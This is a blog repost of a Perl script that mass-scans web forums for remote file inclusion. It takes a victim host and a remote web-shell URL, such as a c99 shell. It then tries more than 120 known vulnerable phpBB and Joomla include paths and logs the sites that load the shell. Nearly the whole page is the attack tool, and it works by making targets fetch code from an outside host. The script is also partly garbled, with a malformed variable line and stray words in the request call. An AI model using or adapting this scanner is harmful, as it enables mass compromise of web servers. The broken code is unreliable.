RFI Scanner Perl PHPbb – v27.9

#!/usr/bin/perl

############################################################
#RFI Scanner Perl PHPbb - v27.9                            #
#Coded by jos_ali_joe RFI Scanner Perl                     #
#Indonesian Docer Team                                     #
#Contact: josalijoe@yahoo.com                              #
#Explore Crew - Indonesian Coder - Devilz COde - IH - HN   #
#ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael      #
############################################################

use HTTP::Request;
use LWP::UserAgent;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
           $linux="0";
        }else{
            $linux="1";
        }
        if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Scanner Perl PHPbb - v27.9 ");
system ("color 02");
}
}

&lw;

print "\t\t########################################################\n\n";
print "\t\t##            RFI Scanner PHPbb v27.9 IDC             ##\n\n";
print "\t\t##                   by jos_ali_joe                   ##\n\n";
print "\t\t##    special thanks : gunslinger_  Mywisdom          ##\n\n";
print "\t\t########################################################\n\n";

print "Insert host:(ex: http://www.maho.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";

# If the url doesn't have http: at the beginning
  if ( $host   !~   /^http:/ ) {

    # we add it
    $host = 'http://' . $host;
}

# If the url doesn't have / at the end
  if ( $host   !~   //$/ ) {

    # we add it
    $host = $host . '/';
}

print "Insert shell:(ex: http://www.maho.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";

# If the url doesn't have http: at the beginning
  if ( $shell   !~   /^http:/ ) {

    # we add it
    $shell = 'http://' . $shell;
}

print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";

print "Your config:\n\n";

print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";

print "Scan...\n\n";

$vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=";
$vuln2="/includes/functions_portal.php?phpbb_root_path=";
$vuln3="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=";
$vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";
$vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path=";
$vuln7="/link_main.php?phpbb_root_path=";
$vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=";
$vuln9="MOD_forum_fields_parse.php?phpbb_root_path=";
$vuln10="/codebb/pass_code.php?phpbb_root_path=";
$vuln11="/codebb/lang_select?phpbb_root_path=";
$vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path=";
$vuln13="/includes/functions.php?phpbb_root_path=";
$vuln14="/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln15="/ezconvert/config.php?ezconvert_dir=";
$vuln16="/includes/class_template.php?phpbb_root_path=";
$vuln17="/includes/usercp_viewprofile.php?phpbb_root_path=";
$vuln18="/includes/functions.php?phpbb_root_path=";
$vuln19="/menu.php?sesion_idioma=";
$vuln20="/includes/functions.php?phpbb_root_path=";
$vuln21="/admin/admin_linkdb.php?phpbb_root_path=";
$vuln22="/admin/admin_extensions.php?phpbb_root_path=";
$vuln23="/admin/admin_board.php?phpbb_root_path=";
$vuln24="/admin/admin_attachments.php?phpbb_root_path=";
$vuln25="/admin/admin_users.php?phpbb_root_path=";
$vuln26="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln28="/admin/modules_data.php?phpbb_root_path=";
$vuln29="/faq.php?foing_root_path=";
$vuln30="/index.php?foing_root_path=";
$vuln31="/list.php?foing_root_path=";
$vuln32="/login.php?foing_root_path=";
$vuln33="/playlist.php?foing_root_path=";
$vuln34="/song.php?foing_root_path=";
$vuln35="/gen_m3u.php?foing_root_path=";
$vuln36="/view_artist.php?foing_root_path=";
$vuln37="/view_song.php?foing_root_path=";
$vuln38="/login.php?foing_root_path=";
$vuln39="/flash/set_na.php?foing_root_path=";
$vuln40="/flash/initialise.php?foing_root_path=";
$vuln41="/flash/get_song.php?foing_root_path=";
$vuln42="/includes/common.php?foing_root_path=";
$vuln43="/admin/nav.php?foing_root_path=";
$vuln44="/admin/main.php?foing_root_path=";
$vuln45="/admin/list_artists.php?foing_root_path=";
$vuln46="/admin/index.php?foing_root_path=";
$vuln47="/admin/genres.php?foing_root_path=";
$vuln48="/admin/edit_artist.php?foing_root_path=";
$vuln49="/admin/edit_album.php?foing_root_path=";
$vuln50="/admin/config.php?foing_root_path=";
$vuln51="/admin/admin_status.php?foing_root_path=";
$vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path=";
$vuln53="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path=";
$vuln55="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln56="/functions_rpg_events.php?phpbb_root_path=";
$vuln57="/admin/admin_spam.php?phpbb_root_path=";
$vuln58="/includes/functions_newshr.php?phpbb_root_path=";
$vuln59="/zufallscodepart.php?phpbb_root_path=";
$vuln60="/mods/iai/includes/constants.php?phpbb_root_path=";
$vuln61="/root/includes/antispam.php?phpbb_root_path=";
$vuln62="/phpBB2/shoutbox.php?phpbb_root_path=";
$vuln63="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln64="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln65="/includes/journals_delete.php?phpbb_root_path=";
$vuln66="/includes/journals_post.php?phpbb_root_path=";
$vuln67="/includes/journals_edit.php?phpbb_root_path=";
$vuln68="/includes/functions_num_image.php?phpbb_root_path=";
$vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path=";
$vuln70="/includes/themen_portal_mitte.php?phpbb_root_path=";
$vuln71="/includes/logger_engine.php?phpbb_root_path=";
$vuln72="/includes/logger_engine.php?phpbb_root_path=";
$vuln73="/includes/functions_static_topics.php?phpbb_root_path=";
$vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=";
$vuln75="/includes/functions_kb.php?phpbb_root_path=";
$vuln76="/includes/bbcb_mg.php?phpbb_root_path=";
$vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=";
$vuln78="/includes/pafiledb_constants.php?module_root_path=";
$vuln79="/index.php?phpbb_root_path=";
$vuln80="/song.php?phpbb_root_path=";
$vuln81="/faq.php?phpbb_root_path=";
$vuln82="/list.php?phpbb_root_path=";
$vuln83="/gen_m3u.php?phpbb_root_path=";
$vuln84="/playlist.php?phpbb_root_path=";
$vuln85="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln86="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln87="/blend_data/blend_common.php?phpbb_root_path=";
$vuln88="/blend_data/blend_common.php?phpbb_root_path=";
$vuln89="/modules/Forums/admin/index.php?phpbb_root_path=";
$vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path=";
$vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path=";
$vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=";
$vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path=";
$vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path=";
$vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path=";
$vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=";
$vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path=";
$vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path=";
$vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path=";
$vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=";
$vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path=";
$vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path=";
$vuln107="/stat_modules/users_age/module.php?phpbb_root_path=";
$vuln108="/includes/functions_cms.php?phpbb_root_path=";
$vuln109="/m2f/m2f_phpbb204.php?m2f_root_path=";
$vuln110="/m2f/m2f_forum.php?m2f_root_path=";
$vuln111="/m2f/m2f_mailinglist.php?m2f_root_path=";
$vuln112="/m2f/m2f_cron.php?m2f_root_path=";
$vuln113="/lib/phpbb.php?subdir=";
$vuln114="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln115="/includes/functions.php?phpbb_root_path=";
$vuln116="/includes/functions_portal.php?phpbb_root_path=";
$vuln117="/includes/functions.php?phpbb_root_path=";
$vuln118="/includes/functions_admin.php?phpbb_root_path=";
$vuln119="/toplist.php?f=toplist_top10&phpbb_root_path=";
$vuln120="/admin/addentry.php?phpbb_root_path=";
$vuln121="/includes/kb_constants.php?module_root_path=";
$vuln122="/auth/auth.php?phpbb_root_path=";
$vuln123="/auth/auth_phpbb/phpbb_root_path=";
$vuln124="/auction/auction_common.php?phpbb_root_path=";
$vuln125="/auth/auth_SMF/smf_root_path=";
$vuln126="/auth/auth.php?smf_root_path=";

for ($i=1;$i<59;$i++)

{

$cont=vuln.$i;
chomp $cont;

print "$cont\n";

$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final alias selesai);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}

}

http://www.packetstormsecurity.org/UNIX/scanners/phpbbrfi-scanner.txt
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s